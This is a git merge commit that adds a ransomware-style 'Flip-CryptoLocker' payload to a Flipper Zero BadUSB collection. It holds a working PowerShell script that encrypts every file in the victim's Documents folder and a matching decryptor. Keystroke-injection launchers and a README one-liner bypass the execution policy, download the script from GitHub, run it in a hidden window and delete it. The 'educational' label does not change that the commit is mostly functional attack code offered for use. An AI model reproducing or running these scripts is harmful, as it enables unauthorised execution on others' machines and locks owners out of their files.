Merge 54c1f90fdb into 9f3852cb81

2024-06-15 17:04:38 +02:00 · 2024-06-15 17:04:38 +02:00 · e1dc68f48d
commit e1dc68f48d
parent 9f3852cb81 54c1f90fdb
6 changed files with 219 additions and 0 deletions
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
@ -0,0 +1,37 @@
+# Flip-CryptoLocker.ps1
+
+function Encrypt-File {
+    param (
+        [Parameter(Mandatory=$true)]
+        [string]$Path,
+        
+        [Parameter(Mandatory=$true)]
+        [string]$Password
+    )
+    
+    $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+    $AES.IV = New-Object byte[]($AES.IV.Length)
+    $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+    $Content = Get-Content -Path $Path -Encoding Byte
+    $EncryptedContent = $AES.CreateEncryptor().TransformFinalBlock($Content, 0, $Content.Length)
+
+    Set-Content -Path $Path -Value $EncryptedContent -Encoding Byte
+}
+
+# Fixed password for encryption (this is only for demonstration purposes, in a real scenario, you would want to generate or receive a password securely)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Encrypt each file
+foreach ($File in $Files) {
+    Encrypt-File -Path $File.FullName -Password $Password
+    Write-Host "File encrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been encrypted!"
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
@ -0,0 +1,13 @@
+REM Flip-CryptoLocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1" -Force
+ENTER
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
@ -0,0 +1,37 @@
+# Flip-CryptoUnlocker.ps1
+
+function Decrypt-File {
+    param (
+        [Parameter(Mandatory=$true)]
+        [string]$Path,
+        
+        [Parameter(Mandatory=$true)]
+        [string]$Password
+    )
+    
+    $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+    $AES.IV = New-Object byte[]($AES.IV.Length)
+    $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+    $EncryptedContent = Get-Content -Path $Path -Encoding Byte
+    $DecryptedContent = $AES.CreateDecryptor().TransformFinalBlock($EncryptedContent, 0, $EncryptedContent.Length)
+
+    Set-Content -Path $Path -Value $DecryptedContent -Encoding Byte
+}
+
+# Fixed password for decryption (it should be the same one used for encryption)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Decrypt each file
+foreach ($File in $Files) {
+    Decrypt-File -Path $File.FullName -Password $Password
+    Write-Host "File decrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been decrypted!"
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
@ -0,0 +1,13 @@
+REM Flip-CryptoUnlocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1" -Force
+ENTER
--- a/Payloads/Flip-CryptoLocker/README.md
+++ b/Payloads/Flip-CryptoLocker/README.md
@ -0,0 +1,118 @@
+<img src="https://avatars.githubusercontent.com/u/120500656?v=4" width="170">
+
+
+<img src="https://media.giphy.com/media/v1.Y2lkPTc5MGI3NjExYzR2YW1nb20wZmY4ZDFkcmJoNDNieHJ2ZnlnbWQzYzMwY204aTQ1dCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9cw/8vF398GFkNiGBVbnfD/giphy.gif" width="50"> 
+
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Flip-CryptoLocker+and+Unlocker!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Flip-CryptoLocker and Unlocker
+
+Scripts designed for educational purposes to encrypt and decrypt files on a target machine.
+
+## Description
+
+The `Flip-CryptoLocker` script encrypts files on the user's machine while the `Flip-CryptoUnlocker` decrypts them. These scripts are designed purely for educational and demonstration purposes.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -O "$D\locker.ps1"; & "$D\locker.ps1"
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+ooovenenoso
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/I_Am_Jakoby">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.instagram.com/i_am_jakoby/">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
+      </a>
+      <br>Instagram
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>Discord
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>TikTok
+    </td>    
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<p align="center">
+        <img src="https://raw.githubusercontent.com/bornmay/bornmay/Update/svg/Bottom.svg" alt="Github Stats" />
+</p>
--- a/README.md
+++ b/README.md
@ -77,6 +77,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
 | [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both.            |✅           | Jakoby      |
 | [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber)             | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both.              |✅           | Jakoby      |
 | [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target.            |✅           | Jakoby      |
+| [CryptoLocker](https://github.com/ooovenenoso/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-CryptoLocker) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |

 <!-- CONTACT -->
 ## Contact